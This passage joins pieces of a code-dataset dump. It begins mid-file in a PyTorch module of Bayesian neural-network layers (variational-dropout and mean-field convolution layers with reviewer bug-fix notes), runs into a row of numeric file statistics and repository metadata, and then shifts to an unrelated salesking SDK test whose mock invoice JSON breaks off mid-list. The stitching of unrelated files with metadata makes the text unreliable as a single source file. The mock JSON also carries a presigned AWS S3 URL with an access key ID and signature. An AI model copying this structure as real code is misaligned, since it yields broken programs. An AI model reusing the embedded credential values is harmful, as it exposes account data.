        if self.bias is not None:
            self.bias.data.zero_()

    def forward(self, x):
        """Dispatch to moment propagation or Monte-Carlo sampling."""
        if self.deterministic:
            return self._det_forward(x)
        return self._mc_forward(x)

    def _mc_forward(self, x):
        """Monte-Carlo forward: sample the output via the local
        reparametrization trick; returns (sample, None)."""
        if isinstance(x, tuple):
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = None  # bug fix: was left unbound -> NameError below
        if self.zero_mean:
            lrt_mean = 0.0
        else:
            lrt_mean = F.linear(x_mean, self.W)
        if self.bias is not None:
            lrt_mean = lrt_mean + self.bias
        sigma2 = torch.exp(self.log_alpha) * self.W * self.W
        if self.permute_sigma:
            # bug fix: randperm was hard-coded to .cuda(); follow W's device
            perm = torch.randperm(self.in_features * self.out_features,
                                  device=self.W.device)
            sigma2 = sigma2.view(-1)[perm].view(
                self.out_features, self.in_features)
        if x_var is None:
            x_var = torch.diag_embed(x_mean * x_mean)
        # NOTE(review): compute_linear_var is called with 4 args here but
        # with 6 (incl. bias mean/var) in LinearGaussian — presumably the
        # bias arguments are optional; confirm against its definition.
        lrt_cov = compute_linear_var(x_mean, x_var, self.W.t(), sigma2.t())
        dst = MultivariateNormal(lrt_mean, covariance_matrix=lrt_cov)
        return dst.rsample(), None

    def _det_forward(self, x):
        """Deterministic forward: return the output mean and covariance."""
        if isinstance(x, tuple):
            x_mean = x[0]
            x_var = x[1]
            if x_var is None:
                # consistency fix: mirror _mc_forward instead of handing
                # None to compute_linear_var
                x_var = torch.diag_embed(x_mean * x_mean)
        else:
            x_mean = x
            x_var = torch.diag_embed(x_mean * x_mean)
        batch_size = x_mean.size(0)
        sigma2 = torch.exp(self.log_alpha) * self.W * self.W
        if self.zero_mean:
            y_mean = torch.zeros(batch_size, self.out_features).to(
                x_mean.device)
        else:
            y_mean = F.linear(x_mean, self.W)
        if self.bias is not None:
            y_mean = y_mean + self.bias
        y_var = compute_linear_var(x_mean, x_var, self.W.t(), sigma2.t())
        return y_mean, y_var

    def compute_kl(self):
        """Log-uniform KL, scaled from per-alpha to per-weight."""
        return self.W.nelement() * self.kl_fun(
            self.log_alpha) / self.log_alpha.nelement()

    def set_flag(self, flag_name, value):
        """Set a mode flag here and on every child exposing set_flag."""
        setattr(self, flag_name, value)
        for m in self.children():
            if hasattr(m, 'set_flag'):
                m.set_flag(flag_name, value)

    def __repr__(self):
        # bug fix: the ', bias=...' fragment was accidentally emitted twice
        # via an implicitly concatenated adjacent string literal
        return self.__class__.__name__ + '(' \
               + 'in_features=' + str(self.in_features) \
               + ', out_features=' + str(self.out_features) \
               + ', alpha_shape=' + str(self.alpha_shape) \
               + ', prior=' + self.prior \
               + ', bias=' + str(self.bias is not None) + ')'
class ReluVDO(LinearVDO):
    """LinearVDO preceded by a moment-matched ReLU activation."""

    def forward(self, x):
        """Apply the ReLU moment propagation, then the VDO linear layer."""
        return super().forward(self._apply_activation(x))

    def _apply_activation(self, x):
        """Push (mean, variance) through a ReLU; plain ReLU without
        variance."""
        if isinstance(x, tuple):
            x_mean, x_var = x
        else:
            x_mean, x_var = x, None
        if x_var is None:
            return F.relu(x_mean), None
        var_diag = matrix_diag_part(x_var)
        std_diag = torch.sqrt(var_diag + EPS)
        mu = x_mean / (std_diag + EPS)
        z_mean = std_diag * softrelu(mu)
        z_var = compute_relu_var(x_var, var_diag, mu)
        return z_mean, z_var
class HeavisideVDO(LinearVDO):
    """LinearVDO preceded by a moment-matched Heaviside activation."""

    def forward(self, x):
        """Apply the Heaviside moment propagation, then the VDO layer."""
        x = self._apply_activation(x)
        return super().forward(x)

    def _apply_activation(self, x):
        """Propagate (mean, variance) through a Heaviside step.

        Fix: accept a bare tensor like the ReLU variants do instead of
        assuming a (mean, var) tuple and failing on ``x[0]``.
        """
        if isinstance(x, tuple):
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = None
        if x_var is None:
            x_var = x_mean * x_mean
        x_var_diag = matrix_diag_part(x_var)
        sqrt_x_var_diag = torch.sqrt(x_var_diag)
        mu = x_mean / (sqrt_x_var_diag + EPS)
        z_mean = gaussian_cdf(mu)
        z_var = compute_heaviside_var(x_var, x_var_diag, mu)
        return z_mean, z_var
class VarianceGaussian(LinearGaussian):
    """LinearGaussian whose weight mean is pinned to zero; only the
    variances learn, optionally parameterized directly as sigma."""

    def __init__(self, in_features, out_features,
                 certain=False, deterministic=True, sigma_sq=False):
        super().__init__(in_features, out_features, certain, deterministic)
        self.W.data.fill_(0)
        self.W.requires_grad = False
        self.sigma_sq = sigma_sq
        if sigma_sq:
            # sigma parameterization: initialize near zero on both sides
            bound = 1 / (in_features + out_features)
            self.W_logvar.data.uniform_(-bound, bound)
            self.bias_logvar.data.uniform_(-1 / out_features,
                                           1 / out_features)

    def _zero_mean_forward(self, x):
        # the weight mean is already zero — reuse the standard paths
        if self.deterministic:
            return self._det_forward(x)
        return self._mcvi_forward(x)

    def _get_var(self, param):
        """Square the parameter (sigma form) or exponentiate (log-var)."""
        return param * param if self.sigma_sq else torch.exp(param)

    def compute_kl(self):
        """No KL regularization for the variance-only layer."""
        return 0
class VarianceReluGaussian(ReluGaussian):
    """ReluGaussian whose weight mean is pinned to zero; only the
    variances learn, optionally parameterized directly as sigma."""

    def __init__(self, in_features, out_features,
                 certain=False, deterministic=True, sigma_sq=False):
        super().__init__(in_features, out_features, certain, deterministic)
        self.W.data.fill_(0)
        self.W.requires_grad = False
        self.sigma_sq = sigma_sq
        if sigma_sq:
            # sigma parameterization: initialize near zero on both sides
            bound = 1 / (in_features + out_features)
            self.W_logvar.data.uniform_(-bound, bound)
            self.bias_logvar.data.uniform_(-1 / out_features,
                                           1 / out_features)

    def _get_var(self, param):
        """Square the parameter (sigma form) or exponentiate (log-var)."""
        return param * param if self.sigma_sq else torch.exp(param)

    def _zero_mean_forward(self, x):
        # the weight mean is already zero — reuse the standard paths
        if self.deterministic:
            return self._det_forward(x)
        return self._mcvi_forward(x)

    def compute_kl(self):
        """No KL regularization for the variance-only layer."""
        return 0
class MeanFieldConv2d(nn.Module):
    """2-D convolution with a fully-factorized (mean-field) Gaussian
    posterior over kernel weights and biases.

    Inputs and outputs travel as (mean, variance) tuples; the variance is
    kept element-wise, unlike the dense LinearGaussian layers."""

    def __init__(self, in_channels, out_channels, kernel_size, stride=1,
                 activation='relu', padding=0, certain=False,
                 deterministic=True):
        """
        :param in_channels: number of input channels
        :param out_channels: number of output channels
        :param kernel_size: int or (h, w) tuple
        :param stride: convolution stride
        :param activation: 'relu' applies a moment-matched ReLU on input
        :param padding: convolution padding
        :param certain: if True, the input equals its mean (no variance)
        :param deterministic: moment propagation (True) vs MCVI sampling
        """
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.stride = stride
        self.padding = padding
        self.activation = activation.strip().lower()
        if not isinstance(kernel_size, tuple):
            kernel_size = (kernel_size, kernel_size)
        self.kernel_size = kernel_size
        self.W = nn.Parameter(
            torch.Tensor(out_channels, in_channels, *self.kernel_size))
        self.W_logvar = nn.Parameter(
            torch.Tensor(out_channels, in_channels, *self.kernel_size))
        self.bias = nn.Parameter(torch.Tensor(out_channels))
        self.bias_logvar = nn.Parameter(torch.Tensor(out_channels))
        self._initialize_weights()
        self._construct_priors()
        self.certain = certain
        self.deterministic = deterministic
        self.mean_forward = False
        self.zero_mean = False

    def _initialize_weights(self):
        """Xavier means; log-variances start small (exp(-10)..exp(-7))."""
        nn.init.xavier_normal_(self.W)
        nn.init.normal_(self.bias)
        nn.init.uniform_(self.W_logvar, a=-10, b=-7)
        nn.init.uniform_(self.bias_logvar, a=-10, b=-7)

    def _get_var(self, param):
        """Interpret the parameter as a log-variance."""
        return torch.exp(param)

    def _construct_priors(self):
        """Fixed N(0, 0.1) priors for weights and biases."""
        self.W_mean_prior = nn.Parameter(torch.zeros_like(self.W),
                                         requires_grad=False)
        self.W_var_prior = nn.Parameter(torch.ones_like(self.W_logvar) * 0.1,
                                        requires_grad=False)
        self.bias_mean_prior = nn.Parameter(torch.zeros_like(self.bias),
                                            requires_grad=False)
        self.bias_var_prior = nn.Parameter(
            torch.ones_like(self.bias_logvar) * 0.1,
            requires_grad=False)

    def compute_kl(self):
        """KL(q || prior) summed over weights and biases."""
        weights_kl = kl_gaussian(self.W, self._get_var(self.W_logvar),
                                 self.W_mean_prior, self.W_var_prior)
        bias_kl = kl_gaussian(self.bias, self._get_var(self.bias_logvar),
                              self.bias_mean_prior, self.bias_var_prior)
        return weights_kl + bias_kl

    def set_flag(self, flag_name, value):
        """Set a mode flag here and on every child exposing set_flag.

        Fix: this method was defined twice in the original class body;
        the identical duplicate has been removed."""
        setattr(self, flag_name, value)
        for m in self.children():
            if hasattr(m, 'set_flag'):
                m.set_flag(flag_name, value)

    def forward(self, x):
        """Apply the input activation, then dispatch on the mode flags."""
        x = self._apply_activation(x)
        if self.zero_mean:
            return self._zero_mean_forward(x)
        elif self.mean_forward:
            return self._mean_forward(x)
        elif self.deterministic:
            return self._det_forward(x)
        else:
            return self._mcvi_forward(x)

    def _zero_mean_forward(self, x):
        # weight means replaced by zeros: the output mean is just the bias
        if self.certain or not self.deterministic:
            x_mean = x if not isinstance(x, tuple) else x[0]
            x_var = x_mean * x_mean
        else:
            x_mean = x[0]
            x_var = x[1]
        W_var = self._get_var(self.W_logvar)
        bias_var = self._get_var(self.bias_logvar)
        z_mean = F.conv2d(x_mean, torch.zeros_like(self.W), self.bias,
                          self.stride,
                          self.padding)
        z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
                         self.padding)
        if self.deterministic:
            return z_mean, z_var
        else:
            # NOTE(review): Normal's second argument is a standard
            # deviation, but z_var here is a variance — confirm whether
            # torch.sqrt(z_var) was intended.
            dst = Independent(Normal(z_mean, z_var), 1)
            sample = dst.rsample()
            return sample, None

    def _mean_forward(self, x):
        """Mean-only pass through the convolution."""
        if not isinstance(x, tuple):
            x_mean = x
        else:
            x_mean = x[0]
        z_mean = F.conv2d(x_mean, self.W, self.bias,
                          self.stride,
                          self.padding)
        return z_mean, None

    def _det_forward(self, x):
        """Propagate mean and element-wise variance deterministically."""
        if self.certain and isinstance(x, tuple):
            x_mean = x[0]
            x_var = x_mean * x_mean
        elif not self.certain:
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = x_mean * x_mean
        W_var = self._get_var(self.W_logvar)
        bias_var = self._get_var(self.bias_logvar)
        z_mean = F.conv2d(x_mean, self.W, self.bias,
                          self.stride,
                          self.padding)
        z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
                         self.padding)
        return z_mean, z_var

    def _mcvi_forward(self, x):
        """Sample the output via the local reparametrization trick."""
        if self.certain or not self.deterministic:
            x_mean = x if not isinstance(x, tuple) else x[0]
            x_var = x_mean * x_mean
        else:
            x_mean = x[0]
            x_var = x[1]
        W_var = self._get_var(self.W_logvar)
        bias_var = self._get_var(self.bias_logvar)
        z_mean = F.conv2d(x_mean, self.W, self.bias,
                          self.stride,
                          self.padding)
        z_var = F.conv2d(x_var, W_var, bias_var, self.stride,
                         self.padding)
        # NOTE(review): as above, z_var is a variance but Normal expects a
        # standard deviation — confirm.
        dst = Independent(Normal(z_mean, z_var), 1)
        sample = dst.rsample()
        return sample, None

    def _apply_activation(self, x):
        """Moment-matched ReLU on (mean, var) input when configured."""
        if self.activation == 'relu' and not self.certain:
            x_mean, x_var = x
            if x_var is None:
                x_var = x_mean * x_mean
            sqrt_x_var = torch.sqrt(x_var + EPS)
            mu = x_mean / sqrt_x_var
            z_mean = sqrt_x_var * softrelu(mu)
            z_var = x_var * (mu * standard_gaussian(mu) + (
                    1 + mu ** 2) * gaussian_cdf(mu))
            return z_mean, z_var
        else:
            return x

    def __repr__(self):
        return self.__class__.__name__ + '(' \
               + 'in_channels=' + str(self.in_channels) \
               + ', out_channels=' + str(self.out_channels) \
               + ', kernel_size=' + str(self.kernel_size) \
               + ', stride=' + str(self.stride) \
               + ', padding=' + str(self.padding) \
               + ', activation=' + str(self.activation) + ')'
class VarianceMeanFieldConv2d(MeanFieldConv2d):
    """MeanFieldConv2d with the weight means pinned to zero; only the
    variances train, optionally parameterized directly as sigma."""

    def __init__(self, in_channels, out_channels, kernel_size, stride=1,
                 activation='relu', padding=0, certain=False,
                 deterministic=True, sigma_sq=False):
        super().__init__(in_channels, out_channels, kernel_size, stride,
                         activation, padding, certain, deterministic)
        self.W.data.fill_(0)
        self.W.requires_grad = False
        self.sigma_sq = sigma_sq
        if sigma_sq:
            # sigma parameterization: initialize near zero on both sides
            bound = 1 / (in_channels + out_channels)
            self.W_logvar.data.uniform_(-bound, bound)
            self.bias_logvar.data.uniform_(-1 / out_channels,
                                           1 / out_channels)

    def _get_var(self, param):
        """Square the parameter (sigma form) or exponentiate (log-var)."""
        return param * param if self.sigma_sq else torch.exp(param)

    def compute_kl(self):
        """No KL term for the variance-only layer."""
        return 0

    def _zero_mean_forward(self, x):
        # the weight mean is already zero — reuse the standard paths
        if self.deterministic:
            return self._det_forward(x)
        return self._mcvi_forward(x)
class MeanFieldConv2dVDO(nn.Module):
    """2-D convolution with variational dropout on the kernel weights:
    weight noise variance is exp(log_alpha) * weight * weight."""

    def __init__(self, in_channels, out_channels, kernel_size, alpha_shape,
                 certain=False, activation='relu', deterministic=True, stride=1,
                 padding=0, dilation=1, prior='loguni', bias=True):
        """
        :param alpha_shape: shape of the log-alpha parameter tensor
        :param bias: add a learnable bias when True
        (remaining parameters as in MeanFieldConv2d)
        """
        super().__init__()
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.kernel_size = (kernel_size, kernel_size)
        self.stride = stride
        self.padding = padding
        self.activation = activation
        self.dilation = dilation
        self.alpha_shape = alpha_shape
        self.groups = 1
        self.weight = nn.Parameter(
            torch.Tensor(out_channels, in_channels, *self.kernel_size))
        if bias:
            self.bias = nn.Parameter(torch.Tensor(1, out_channels, 1, 1))
        else:
            self.register_parameter('bias', None)
        # bug fix: the original lambda called self.bias.flatten()
        # unconditionally, crashing when bias=False
        self.op_bias = lambda input, kernel: F.conv2d(input, kernel,
                                                      self._flat_bias(),
                                                      self.stride, self.padding,
                                                      self.dilation,
                                                      self.groups)
        self.op_nobias = lambda input, kernel: F.conv2d(input, kernel, None,
                                                        self.stride,
                                                        self.padding,
                                                        self.dilation,
                                                        self.groups)
        self.log_alpha = nn.Parameter(torch.Tensor(*alpha_shape))
        self.reset_parameters()
        self.certain = certain
        self.deterministic = deterministic
        self.mean_forward = False
        self.zero_mean = False
        self.permute_sigma = False
        self.prior = prior
        self.kl_fun = kl_loguni

    def _flat_bias(self):
        """Bias as the 1-D tensor F.conv2d expects, or None if disabled."""
        return None if self.bias is None else self.bias.flatten()

    def reset_parameters(self):
        """Uniform init for weight/bias; log-alpha starts at -5."""
        n = self.in_channels
        for k in self.kernel_size:
            n *= k
        stdv = 1. / math.sqrt(n)
        self.weight.data.uniform_(-stdv, stdv)
        if self.bias is not None:
            self.bias.data.uniform_(-stdv, stdv)
        self.log_alpha.data.fill_(-5.0)

    def forward(self, x):
        """Apply the input activation, then dispatch on the mode flags."""
        x = self._apply_activation(x)
        if self.zero_mean:
            return self._zero_mean_forward(x)
        elif self.mean_forward:
            return self._mean_forward(x)
        elif self.deterministic:
            return self._det_forward(x)
        else:
            return self._mcvi_forward(x)

    def _apply_activation(self, x):
        """Moment-matched ReLU on (mean, var) input when configured."""
        if self.activation == 'relu' and not self.certain:
            x_mean, x_var = x
            if x_var is None:
                x_var = x_mean * x_mean
            sqrt_x_var = torch.sqrt(x_var + EPS)
            mu = x_mean / sqrt_x_var
            z_mean = sqrt_x_var * softrelu(mu)
            z_var = x_var * (mu * standard_gaussian(mu) + (
                    1 + mu ** 2) * gaussian_cdf(mu))
            return z_mean, z_var
        else:
            return x

    def _zero_mean_forward(self, x):
        # weight means replaced by zeros: output mean is just the bias
        if self.certain or not self.deterministic:
            x_mean = x if not isinstance(x, tuple) else x[0]
            x_var = x_mean * x_mean
        else:
            x_mean = x[0]
            x_var = x[1]
        W_var = torch.exp(self.log_alpha) * self.weight * self.weight
        # bug fix: self.bias has shape (1, C, 1, 1), which F.conv2d rejects
        # as a bias argument; pass the flattened 1-D bias (or None)
        z_mean = F.conv2d(x_mean, torch.zeros_like(self.weight),
                          self._flat_bias(),
                          self.stride,
                          self.padding)
        z_var = F.conv2d(x_var, W_var, bias=None, stride=self.stride,
                         padding=self.padding)
        if self.deterministic:
            return z_mean, z_var
        else:
            # NOTE(review): Normal expects a std; z_var is a variance —
            # confirm whether torch.sqrt(z_var) was intended.
            dst = Independent(Normal(z_mean, z_var), 1)
            sample = dst.rsample()
            return sample, None

    def _mean_forward(self, x):
        """Mean-only convolution pass."""
        if not isinstance(x, tuple):
            x_mean = x
        else:
            x_mean = x[0]
        # bug fix: flatten the (1, C, 1, 1) bias for F.conv2d
        z_mean = F.conv2d(x_mean, self.weight, self._flat_bias(),
                          self.stride,
                          self.padding)
        return z_mean, None

    def _det_forward(self, x):
        """Deterministic propagation of mean and element-wise variance."""
        if self.certain and isinstance(x, tuple):
            x_mean = x[0]
            x_var = x_mean * x_mean
        elif not self.certain:
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = x_mean * x_mean
        W_var = torch.exp(self.log_alpha) * self.weight * self.weight
        # bug fix: None-safe flattened bias (was self.bias.flatten())
        z_mean = F.conv2d(x_mean, self.weight, self._flat_bias(),
                          self.stride,
                          self.padding)
        z_var = F.conv2d(x_var, W_var, bias=None, stride=self.stride,
                         padding=self.padding)
        return z_mean, z_var

    def _mcvi_forward(self, x):
        """Local-reparametrization sample of the convolution output."""
        if isinstance(x, tuple):
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = x_mean * x_mean
        if self.zero_mean:
            lrt_mean = self.op_bias(x_mean, 0.0 * self.weight)
        else:
            lrt_mean = self.op_bias(x_mean, self.weight)
        sigma2 = torch.exp(self.log_alpha) * self.weight * self.weight
        if self.permute_sigma:
            # bug fix: randperm was hard-coded to .cuda(); follow the
            # weight's device instead
            perm = torch.randperm(self.weight.nelement(),
                                  device=self.weight.device)
            sigma2 = sigma2.view(-1)[perm].view(self.weight.shape)
        lrt_std = torch.sqrt(1e-16 + self.op_nobias(x_var, sigma2))
        if self.training:
            eps = lrt_std.data.new(lrt_std.size()).normal_()
        else:
            eps = 0.0
        return lrt_mean + lrt_std * eps, None

    def compute_kl(self):
        """Log-uniform KL scaled from per-alpha to per-weight."""
        return self.weight.nelement() / self.log_alpha.nelement() * kl_loguni(
            self.log_alpha)

    def __repr__(self):
        s = ('{name}({in_channels}, {out_channels}, kernel_size={kernel_size}'
             ', stride={stride}')
        s += ', padding={padding}'
        s += ', alpha_shape=' + str(self.alpha_shape)
        s += ', prior=' + self.prior
        s += ', dilation={dilation}'
        if self.bias is None:
            s += ', bias=False'
        s += ')'
        return s.format(name=self.__class__.__name__, **self.__dict__)

    def set_flag(self, flag_name, value):
        """Set a mode flag here and on every child exposing set_flag."""
        setattr(self, flag_name, value)
        for m in self.children():
            if hasattr(m, 'set_flag'):
                m.set_flag(flag_name, value)
class AveragePoolGaussian(nn.Module):
    """Average pooling over (mean, variance) pairs.

    The mean is pooled as usual; the variance of an average of n
    independent entries shrinks by an extra factor of n."""

    def __init__(self, kernel_size, stride=None, padding=0):
        super().__init__()
        if not isinstance(kernel_size, tuple):
            kernel_size = (kernel_size, kernel_size)
        self.kernel_size = kernel_size
        self.stride = stride
        self.padding = padding

    def forward(self, x):
        """Pool a (mean, var) tuple; var may be None."""
        if not isinstance(x, tuple):
            raise ValueError(
                "Input for pooling layer should be tuple of tensors")
        x_mean, x_var = x
        z_mean = F.avg_pool2d(x_mean, self.kernel_size, self.stride,
                              self.padding)
        if x_var is None:
            return z_mean, None
        window = self.kernel_size[0] * self.kernel_size[1]
        z_var = F.avg_pool2d(x_var, self.kernel_size, self.stride,
                             self.padding) / window
        return z_mean, z_var

    def __repr__(self):
        return self.__class__.__name__ + '(' \
               + 'kernel_size= ' + str(self.kernel_size) \
               + ', stride=' + str(self.stride) \
               + ', padding=' + str(self.padding) + ')'

    def set_flag(self, flag_name, value):
        """Set a mode flag here and on every child exposing set_flag."""
        setattr(self, flag_name, value)
        for m in self.children():
            if hasattr(m, 'set_flag'):
                m.set_flag(flag_name, value)
| 33.238095 | 83 | 0.558544 | 3,950 | 30,712 | 4.052152 | 0.052658 | 0.032488 | 0.023616 | 0.008747 | 0.857241 | 0.846745 | 0.830126 | 0.784706 | 0.774522 | 0.746158 | 0 | 0.007592 | 0.34384 | 30,712 | 923 | 84 | 33.274106 | 0.786671 | 0.035296 | 0 | 0.808392 | 0 | 0 | 0.016915 | 0.001566 | 0 | 0 | 0 | 0 | 0 | 1 | 0.100699 | false | 0 | 0.008392 | 0.01958 | 0.227972 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d8ca759ad556b688453777f77bef5e159c1ecb01 | 22,400 | py | Python | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | null | null | null | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | 5 | 2015-01-21T09:23:06.000Z | 2015-02-01T18:44:22.000Z | salesking/tests/test_invoice_mock.py | salesking/salesking_python_sdk | 0d5a95c5ee4e16a85562ceaf67bb11b55e47ee4c | [
"Apache-2.0"
] | null | null | null | from salesking.tests.base import SalesKingBaseTestCase
from salesking import api, resources
class MockInvoiceResponse(object):
def __init__(self):
self.status_code = 200
self.content = u'''
{"invoice":
{"id":"bUAr_Qlb4r4BelabxfpGMl","number":"R-069-2011-215a","address_field":"Werbeagentur Gl\u00fcck\nKleeweg 4\n30001 Berlin","date":"2011-12-21","due_days":3,"due_date":"2011-12-24","status":"closed","external_ref":null,"payment_method":null,"title":"Projekt Tippspiel","notes_before":"Wir m\u00f6chten Ihnen folgende Positionen in Rechnung stellen:","notes_after":"Bitte \u00fcberweisen Sie den Rechnungsbetrag bis zum 24.12.2011.","tag_list":"!example","language":null,"currency":"EUR","exchange_rate":null,"gross_total_exchanged":1950.0,"archived_pdf":
{"attachment":{"id":"bVKYQ-lb4r4BelabxfpGMl","filename":"just_a_test.pdf","disk_filename":"111221215503038_just_a_test.pdf","url":"https://sk2-dev.s3.amazonaws.com/cPUdkOlb0r4BelabxfpGMl/attachments/Document/111221215503038_just_a_test.pdf?X-Amz-Expires=1200&X-Amz-Date=20150128T181758Z&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=134E61V8BNTFFTK4T982/20150128/us-east-1/s3/aws4_request&X-Amz-SignedHeaders=host&X-Amz-Signature=6bcef58961133d4e28963f9e0643751cdaaa6d5a57505c4dd00df69de8628cfe","related_object_type":"Document","related_object_id":"bUAr_Qlb4r4BelabxfpGMl","content_type":"application/pdf","size":32814,"is_signed":null,"created_at":"2011-12-21T22:55:03+01:00","team_id":null},"links":
[{"rel":"self","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"},
{"rel":"download","href":"attachments/bVKYQ-lb4r4BelabxfpGMl/download"},
{"rel":"instances","href":"attachments"},
{"rel":"destroy","href":"attachments/bVKYQ-lb4r4BelabxfpGMl"}]
},"sepa_mandate_id":null,"sepa_mandate_signed_at":null,"sepa_debit_sequence_type":null,
"client":{"links":[
{"rel":"self","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"clients"},
{"rel":"destroy","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"clients/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"clients"},
{"rel":"documents","href":"clients/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"clients/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"clients/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"clients/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"clients/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"clients/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"clients/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"clients/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"clients/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"clients/bUvvUglb4r4BelabxfpGMl/emails"}
],
"client":{
"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,
"type":"Client","is_employee":false,"number":"K-01012-728",
"organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer",
"gender":"male",
"notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,
"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00",
"language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,
"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,
"lock_version":1,"cash_discount":null,"due_days":null,
"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin",
"addresses":[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001",
"state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00",
"address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}
}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,
"sales_potential":null,"probability":null,"expected_revenue":null}},
"client_id":"bUvvUglb4r4BelabxfpGMl",
"contact":
{"contact":
{"id":"bUvvUglb4r4BelabxfpGMl","parent_id":null,"type":"Client","is_employee":false,"number":"K-01012-728","organisation":"Werbeagentur Gl\u00fcck","last_name":"zu Fall","first_name":"Rainer","gender":"male","notes":null,"position":null,"title":null,"tax_number":null,"vat_number":null,"email":"","url":null,"birthday":null,"tag_list":"!example","created_at":"2011-12-21T22:55:00+01:00","updated_at":"2012-02-02T20:07:36+01:00","language":null,"currency":"EUR","payment_method":null,"bank_name":null,"bank_number":null,"bank_account_number":null,"bank_iban":null,"bank_swift":null,"bank_owner":null,"phone_fax":null,"phone_office":null,"phone_home":null,"phone_mobile":null,"lock_version":1,"cash_discount":null,"due_days":null,"address_field":"Werbeagentur Gl\u00fcck\nHerr Rainer zu Fall\nKleeweg 4\n30001 Berlin","addresses":
[{"address":
{"id":"bUvub0lb4r4BelabxfpGMl","city":"Berlin","address1":"Kleeweg 4","address2":null,"pobox":"","zip":"30001","state":null,"country":null,"created_at":"2011-12-21T22:55:00+01:00","updated_at":"2011-12-21T22:55:00+01:00","address_type":null,"order":null,"lat":null,"long":null,"_destroy":false}}],
"team_id":null,"lead_source":null,"lead_ref":null,"lead_date":null,"converted_at":null,"sales_potential":null,"probability":null,"expected_revenue":null},
"links":[{"rel":"self","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"instances","href":"contacts"},
{"rel":"destroy","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"update","href":"contacts/bUvvUglb4r4BelabxfpGMl"},
{"rel":"create","href":"contacts"},
{"rel":"documents","href":"contacts/bUvvUglb4r4BelabxfpGMl/documents"},
{"rel":"attachments","href":"contacts/bUvvUglb4r4BelabxfpGMl/attachments"},
{"rel":"invoices","href":"contacts/bUvvUglb4r4BelabxfpGMl/invoices"},
{"rel":"estimates","href":"contacts/bUvvUglb4r4BelabxfpGMl/estimates"},
{"rel":"orders","href":"contacts/bUvvUglb4r4BelabxfpGMl/orders"},
{"rel":"credit_notes","href":"contacts/bUvvUglb4r4BelabxfpGMl/credit_notes"},
{"rel":"recurrings","href":"contacts/bUvvUglb4r4BelabxfpGMl/recurrings"},
{"rel":"payment_reminders","href":"contacts/bUvvUglb4r4BelabxfpGMl/payment_reminders"},
{"rel":"comments","href":"contacts/bUvvUglb4r4BelabxfpGMl/comments"},
{"rel":"emails","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"},
{"rel":"emails create","href":"contacts/bUvvUglb4r4BelabxfpGMl/emails"}]},
"contact_id":"bUvvUglb4r4BelabxfpGMl","team_id":null,
"line_items":[{"line_item":
{"id":"bUAl2ylb4r4BelabxfpGMl","position":1,"name":"Projektarbeit","type":"LineItem","external_ref":null,"description":null,"price_single":650.0,"cost":null,"cost_total":0.0,"gross_margin_total":650.0,"gross_margin_pct":100.0,"net_total":650.0,"gross_total":650.0,"tax":0.0,"discount":0.0,"quantity_unit":"Tage","quantity":1.0,"product_id":null,"product_from_line_item":null,"created_at":"2011-12-21T22:55:01+01:00","updated_at":"2011-12-21T22:55:01+01:00","_destroy":false}},
{"line_item":
